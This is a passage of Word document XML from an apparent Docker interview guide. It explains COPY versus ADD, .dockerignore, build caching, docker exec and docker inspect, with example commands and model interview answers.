        <w:t>FROM nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY index.html /usr/share/nginx/html/</w:t>
        <w:br/>
        <w:t>Simple and predictable.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Using ADD</w:t>
        <w:br/>
        <w:t>FROM ubuntu</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ADD app.tar.gz /opt/app/</w:t>
        <w:br/>
        <w:t>Docker automatically extracts the archive.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best Practice</w:t>
        <w:br/>
        <w:t>Use COPY unless you specifically need:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automatic tar extraction</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * URL download</w:t>
        <w:br/>
        <w:t>Preferred:</w:t>
        <w:br/>
        <w:t>COPY . /app</w:t>
        <w:br/>
        <w:t>Instead of:</w:t>
        <w:br/>
        <w:t>ADD . /app</w:t>
        <w:br/>
        <w:t>because COPY is more explicit and easier to understand.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why COPY is Preferred</w:t>
        <w:br/>
        <w:t>Security and maintainability:</w:t>
        <w:br/>
        <w:t>COPY app.jar /app/</w:t>
        <w:br/>
        <w:t>The behavior is obvious.</w:t>
        <w:br/>
        <w:t>With ADD:</w:t>
        <w:br/>
        <w:t>ADD app.tar.gz /app/</w:t>
        <w:br/>
        <w:t>Additional actions happen automatically, which can make builds less predictable.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>COPY and ADD are Dockerfile instructions used to transfer files into a container image. COPY performs a straightforward file or directory copy from the build context and is the recommended option for most use cases because of its simplicity and predictability. ADD extends COPY by supporting automatic extraction of local tar archives and downloading content from URLs. However, these additional behaviors can make builds less predictable, so Docker best practices recommend using COPY by default and reserving ADD only for cases where archive extraction or URL retrieval is specifically required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q379. What is .dockerignore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is</w:t>
        <w:br/>
        <w:t>.dockerignore</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>.dockerignore is a file used to specify files and directories that should be excluded from the Docker build context when running docker build.</w:t>
        <w:br/>
        <w:t>It works similarly to .gitignore.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use</w:t>
        <w:br/>
        <w:t>.dockerignore</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>When you run:</w:t>
        <w:br/>
        <w:t>docker build -t myapp .</w:t>
        <w:br/>
        <w:t>Docker sends the entire current directory (build context) to the Docker daemon.</w:t>
        <w:br/>
        <w:t>Without .dockerignore:</w:t>
        <w:br/>
        <w:t>Project</w:t>
        <w:br/>
        <w:t>├── src/</w:t>
        <w:br/>
        <w:t>├── node_modules/</w:t>
        <w:br/>
        <w:t>├── .git/</w:t>
        <w:br/>
        <w:t>├── logs/</w:t>
        <w:br/>
        <w:t>├── temp/</w:t>
        <w:br/>
        <w:t>└── Dockerfile</w:t>
        <w:br/>
        <w:t>Everything gets sent to Docker, increasing:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Build time</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network transfer</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image size (if copied)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security risk</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>.dockerignore</w:t>
        <w:br/>
        <w:t>node_modules</w:t>
        <w:br/>
        <w:t>.git</w:t>
        <w:br/>
        <w:t>*.log</w:t>
        <w:br/>
        <w:t>temp/</w:t>
        <w:br/>
        <w:t>.env</w:t>
        <w:br/>
        <w:t>Docker ignores these files and directories during the build.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Project</w:t>
        <w:br/>
        <w:t>myapp/</w:t>
        <w:br/>
        <w:t>├── Dockerfile</w:t>
        <w:br/>
        <w:t>├── .dockerignore</w:t>
        <w:br/>
        <w:t>├── src/</w:t>
        <w:br/>
        <w:t>├── node_modules/</w:t>
        <w:br/>
        <w:t>├── .git/</w:t>
        <w:br/>
        <w:t>└── app.log</w:t>
        <w:br/>
        <w:t>.dockerignore</w:t>
        <w:br/>
        <w:t>node_modules</w:t>
        <w:br/>
        <w:t>.git</w:t>
        <w:br/>
        <w:t>*.log</w:t>
        <w:br/>
        <w:t>Build:</w:t>
        <w:br/>
        <w:t>docker build -t myapp .</w:t>
        <w:br/>
        <w:t>Docker excludes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * node_modules</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * .git</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * app.log</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Entries</w:t>
        <w:br/>
        <w:t>Git Files</w:t>
        <w:br/>
        <w:t>.git</w:t>
        <w:br/>
        <w:t>.gitignore</w:t>
        <w:br/>
        <w:t>Logs</w:t>
        <w:br/>
        <w:t>*.log</w:t>
        <w:br/>
        <w:t>logs/</w:t>
        <w:br/>
        <w:t>Dependencies</w:t>
        <w:br/>
        <w:t>node_modules/</w:t>
        <w:br/>
        <w:t>vendor/</w:t>
        <w:br/>
        <w:t>target/</w:t>
        <w:br/>
        <w:t>IDE Files</w:t>
        <w:br/>
        <w:t>.vscode/</w:t>
        <w:br/>
        <w:t>.idea/</w:t>
        <w:br/>
        <w:t>Secrets</w:t>
        <w:br/>
        <w:t>.env</w:t>
        <w:br/>
        <w:t>*.pem</w:t>
        <w:br/>
        <w:t>*.key</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t>Faster Builds</w:t>
        <w:br/>
        <w:t>Before: 2 GB context</w:t>
        <w:br/>
        <w:t>After : 50 MB context</w:t>
        <w:br/>
        <w:t>Less data is transferred to Docker.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Smaller Images</w:t>
        <w:br/>
        <w:t>Avoid accidentally copying unnecessary files.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Better Security</w:t>
        <w:br/>
        <w:t>Prevents sensitive files from being included:</w:t>
        <w:br/>
        <w:t>.env</w:t>
        <w:br/>
        <w:t>credentials.json</w:t>
        <w:br/>
        <w:t>private.key</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Improved CI/CD Performance</w:t>
        <w:br/>
        <w:t>Smaller build contexts lead to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced bandwidth usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Lower storage consumption</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Dockerfile</w:t>
        <w:br/>
        <w:t>FROM node:24-slim</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN npm install</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["npm","start"]</w:t>
        <w:br/>
        <w:t>Without .dockerignore, large folders like node_modules may be copied unnecessarily.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best Practice</w:t>
        <w:br/>
        <w:t>Create a .dockerignore file for every Docker project.</w:t>
        <w:br/>
        <w:t>Typical example:</w:t>
        <w:br/>
        <w:t>.git</w:t>
        <w:br/>
        <w:t>.gitignore</w:t>
        <w:br/>
        <w:t>node_modules</w:t>
        <w:br/>
        <w:t>target</w:t>
        <w:br/>
        <w:t>dist</w:t>
        <w:br/>
        <w:t>logs</w:t>
        <w:br/>
        <w:t>*.log</w:t>
        <w:br/>
        <w:t>.env</w:t>
        <w:br/>
        <w:t>.vscode</w:t>
        <w:br/>
        <w:t>.idea</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>.dockerignore is a file that defines which files and directories should be excluded from the Docker build context. During a Docker build, the build context is sent to the Docker daemon, and excluding unnecessary files reduces build time, network transfer, and image size. It is commonly used to omit source control metadata, dependency directories, logs, temporary files, and sensitive information such as environment files and private keys. Using .dockerignore is a Docker best practice that improves build efficiency, security, and CI/CD performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q380. Explain build cache.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Docker Build Cache?</w:t>
        <w:br/>
        <w:t>Docker build cache is a mechanism that allows Docker to reuse previously built image layers instead of rebuilding them every time.</w:t>
        <w:br/>
        <w:t>This significantly speeds up image builds.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Build Cache Works</w:t>
        <w:br/>
        <w:t>Docker builds images layer by layer.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>FROM node:24-slim</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY package.json .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN npm install</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["node","server.js"]</w:t>
        <w:br/>
        <w:t>Build process:</w:t>
        <w:br/>
        <w:t>Layer 1 → FROM</w:t>
        <w:br/>
        <w:t>Layer 2 → WORKDIR</w:t>
        <w:br/>
        <w:t>Layer 3 → COPY package.json</w:t>
        <w:br/>
        <w:t>Layer 4 → RUN npm install</w:t>
        <w:br/>
        <w:t>Layer 5 → COPY . .</w:t>
        <w:br/>
        <w:t>Layer 6 → CMD</w:t>
        <w:br/>
        <w:t>Docker caches each layer after a successful build.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>First Build</w:t>
        <w:br/>
        <w:t>docker build -t myapp .</w:t>
        <w:br/>
        <w:t>Layer 1 → Built</w:t>
        <w:br/>
        <w:t>Layer 2 → Built</w:t>
        <w:br/>
        <w:t>Layer 3 → Built</w:t>
        <w:br/>
        <w:t>Layer 4 → Built</w:t>
        <w:br/>
        <w:t>Layer 5 → Built</w:t>
        <w:br/>
        <w:t>Layer 6 → Built</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Second Build (No Changes)</w:t>
        <w:br/>
        <w:t>docker build -t myapp .</w:t>
        <w:br/>
        <w:t>Layer 1 → Using Cache</w:t>
        <w:br/>
        <w:t>Layer 2 → Using Cache</w:t>
        <w:br/>
        <w:t>Layer 3 → Using Cache</w:t>
        <w:br/>
        <w:t>Layer 4 → Using Cache</w:t>
        <w:br/>
        <w:t>Layer 5 → Using Cache</w:t>
        <w:br/>
        <w:t>Layer 6 → Using Cache</w:t>
        <w:br/>
        <w:t>Build completes very quickly.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Cache Invalidation</w:t>
        <w:br/>
        <w:t>If a layer changes, Docker rebuilds that layer and all subsequent layers.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>COPY package.json .</w:t>
        <w:br/>
        <w:t>If package.json changes:</w:t>
        <w:br/>
        <w:t>Layer 1 → Cached</w:t>
        <w:br/>
        <w:t>Layer 2 → Cached</w:t>
        <w:br/>
        <w:t>Layer 3 → Rebuilt</w:t>
        <w:br/>
        <w:t>Layer 4 → Rebuilt</w:t>
        <w:br/>
        <w:t>Layer 5 → Rebuilt</w:t>
        <w:br/>
        <w:t>Layer 6 → Rebuilt</w:t>
        <w:br/>
        <w:t>Everything after the changed layer is rebuilt.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Optimize Dockerfile for Caching</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN npm install</w:t>
        <w:br/>
        <w:t>Any source code change triggers dependency reinstallation.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Good:</w:t>
        <w:br/>
        <w:t>COPY package.json .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN npm install</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>Code Change</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>COPY . . Rebuilds</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>npm install Layer Reused</w:t>
        <w:br/>
        <w:t>Dependencies are not reinstalled unless package.json changes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>View Cache Usage</w:t>
        <w:br/>
        <w:t>Build output:</w:t>
        <w:br/>
        <w:t>=&gt; CACHED [2/6] WORKDIR /app</w:t>
        <w:br/>
        <w:t>=&gt; CACHED [3/6] COPY package.json .</w:t>
        <w:br/>
        <w:t>Indicates Docker reused existing layers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Disable Cache</w:t>
        <w:br/>
        <w:t>Force a fresh build:</w:t>
        <w:br/>
        <w:t>docker build --no-cache -t myapp .</w:t>
        <w:br/>
        <w:t>Use when:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Troubleshooting</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dependency refreshes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BuildKit Cache</w:t>
        <w:br/>
        <w:t>Modern Docker uses BuildKit, which provides:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster builds</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Parallel execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Advanced cache management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Remote cache support</w:t>
        <w:br/>
        <w:t>Enable:</w:t>
        <w:br/>
        <w:t>DOCKER_BUILDKIT=1 docker build .</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CI/CD Optimization</w:t>
        <w:br/>
        <w:t>Example workflow:</w:t>
        <w:br/>
        <w:t>Previous Build Cache</w:t>
        <w:br/>
        <w:t xml:space="preserve">          │</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ▼</w:t>
        <w:br/>
        <w:t>CI Pipeline</w:t>
        <w:br/>
        <w:t xml:space="preserve">          │</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ▼</w:t>
        <w:br/>
        <w:t>Reuse Layers</w:t>
        <w:br/>
        <w:t xml:space="preserve">          │</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ▼</w:t>
        <w:br/>
        <w:t>Faster Build</w:t>
        <w:br/>
        <w:t>Many CI systems store build cache between runs to reduce build times.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best Practices</w:t>
        <w:br/>
        <w:t>✅ Place frequently changing instructions near the end of the Dockerfile</w:t>
        <w:br/>
        <w:t>✅ Copy dependency files before application code</w:t>
        <w:br/>
        <w:t>✅ Use multi-stage builds</w:t>
        <w:br/>
        <w:t>✅ Use BuildKit</w:t>
        <w:br/>
        <w:t>✅ Leverage remote cache in CI/CD</w:t>
        <w:br/>
        <w:t>✅ Avoid unnecessary cache invalidation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker build cache is a layer-based optimization mechanism that reuses previously built image layers when the corresponding Dockerfile instructions and input files have not changed. During a build, Docker checks whether a layer already exists in the cache and reuses it instead of rebuilding it. If a layer changes, that layer and all subsequent layers are rebuilt. Effective Dockerfile design, such as copying dependency manifests before application source code, maximizes cache reuse and significantly reduces build times in local development and CI/CD pipelines. Modern Docker builds typically leverage BuildKit for enhanced caching and build performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q381. What is docker exec?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is</w:t>
        <w:br/>
        <w:t>docker exec</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>docker exec is a Docker command used to run a new command inside an already running container.</w:t>
        <w:br/>
        <w:t>It allows you to access, inspect, troubleshoot, or execute tasks within a running container without restarting it.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Syntax</w:t>
        <w:br/>
        <w:t>docker exec [OPTIONS] CONTAINER COMMAND</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Examples</w:t>
        <w:br/>
        <w:t>Open a Shell</w:t>
        <w:br/>
        <w:t>docker exec -it nginx-container /bin/bash</w:t>
        <w:br/>
        <w:t>If Bash is not available:</w:t>
        <w:br/>
        <w:t>docker exec -it nginx-container /bin/sh</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check Running Processes</w:t>
        <w:br/>
        <w:t>docker exec -it nginx-container ps -ef</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>View Files</w:t>
        <w:br/>
        <w:t>docker exec -it nginx-container ls -l /app</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check Environment Variables</w:t>
        <w:br/>
        <w:t>docker exec -it nginx-container env</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important Options</w:t>
        <w:br/>
        <w:t>Option</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Description</w:t>
        <w:br/>
        <w:tab/>
        <w:t>-i</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Keep STDIN open</w:t>
        <w:br/>
        <w:tab/>
        <w:t>-t</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Allocate a terminal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>-it</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Interactive terminal session</w:t>
        <w:br/>
        <w:tab/>
        <w:t>-u</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Run as a specific user</w:t>
        <w:br/>
        <w:tab/>
        <w:t>-e</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pass environment variable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker exec -u root -it mycontainer bash</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How It Works</w:t>
        <w:br/>
        <w:t>Running Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>docker exec</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>New Process Inside Container</w:t>
        <w:br/>
        <w:t>The container’s main process continues running while Docker starts an additional process inside the same container.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>docker exec vs docker run</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker exec</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker run</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Creates New Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Uses Existing Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Starts New Process</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Common Use</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Troubleshooting/Admin Tasks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Launch Application</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t>Creates a new container.</w:t>
        <w:br/>
        <w:t>docker exec -it nginx-container bash</w:t>
        <w:br/>
        <w:t>Accesses an existing container.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Uses</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Debugging application issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Checking logs and files</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Verifying configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Running database commands</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Troubleshooting network connectivity</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker exec -it mysql-container mysql -u root -p</w:t>
        <w:br/>
        <w:t>Connect directly to a running MySQL instance.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes Equivalent</w:t>
        <w:br/>
        <w:t>Docker:</w:t>
        <w:br/>
        <w:t>docker exec -it container bash</w:t>
        <w:br/>
        <w:t>Kubernetes:</w:t>
        <w:br/>
        <w:t>kubectl exec -it pod-name -- bash</w:t>
        <w:br/>
        <w:t>Both allow interactive access to a running workload.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>docker exec is used to execute a command inside an already running container. Unlike docker run, which creates a new container, docker exec starts an additional process within an existing container. It is commonly used for troubleshooting, inspecting files, checking processes, validating configurations, and performing administrative tasks. The -it option is frequently used to open an interactive shell session inside the container for debugging and operational support.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q382. Explain docker inspect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is</w:t>
        <w:br/>
        <w:t>docker inspect</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>docker inspect is a Docker command used to view detailed low-level information about Docker objects such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Networks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Volumes</w:t>
        <w:br/>
        <w:t>It returns information in JSON format.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Syntax</w:t>
        <w:br/>
        <w:t>docker inspect &lt;object_name_or_id&gt;</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker inspect nginx-container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Information Does It Provide?</w:t>
        <w:br/>
        <w:t>For a container, it shows:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container ID</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image details</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network settings</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IP address</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Mounted volumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Environment variables</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Port mappings</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container state</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Resource configuration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>docker inspect nginx-container</w:t>
        <w:br/>
        <w:t>Output (simplified):</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "Id": "a1b2c3",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "State": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Status": "running"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "NetworkSettings": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "IPAddress": "172.17.0.2"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t>Get Container IP Address</w:t>
        <w:br/>
        <w:t>docker inspect -f '{{.NetworkSettings.IPAddress}}' nginx-container</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>172.17.0.2</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check Container Status</w:t>
        <w:br/>
        <w:t>docker inspect -f '{{.State.Status}}' nginx-container</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>running</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>View Mounted Volumes</w:t>
        <w:br/>
        <w:t>docker inspect -f '{{json .Mounts}}' nginx-container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check Image Used</w:t>
        <w:br/>
        <w:t>docker inspect -f '{{.Config.Image}}' nginx-container</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>nginx:latest</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Inspect Other Docker Objects</w:t>
        <w:br/>
        <w:t>Image</w:t>
        <w:br/>
        <w:t>docker inspect nginx:latest</w:t>
        <w:br/>
        <w:t>Network</w:t>
        <w:br/>
        <w:t>docker inspect bridge</w:t>
        <w:br/>
        <w:t>Volume</w:t>
        <w:br/>
        <w:t>docker inspect myvolume</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Useful Formatting</w:t>
        <w:br/>
        <w:t>Docker supports Go templates:</w:t>
        <w:br/>
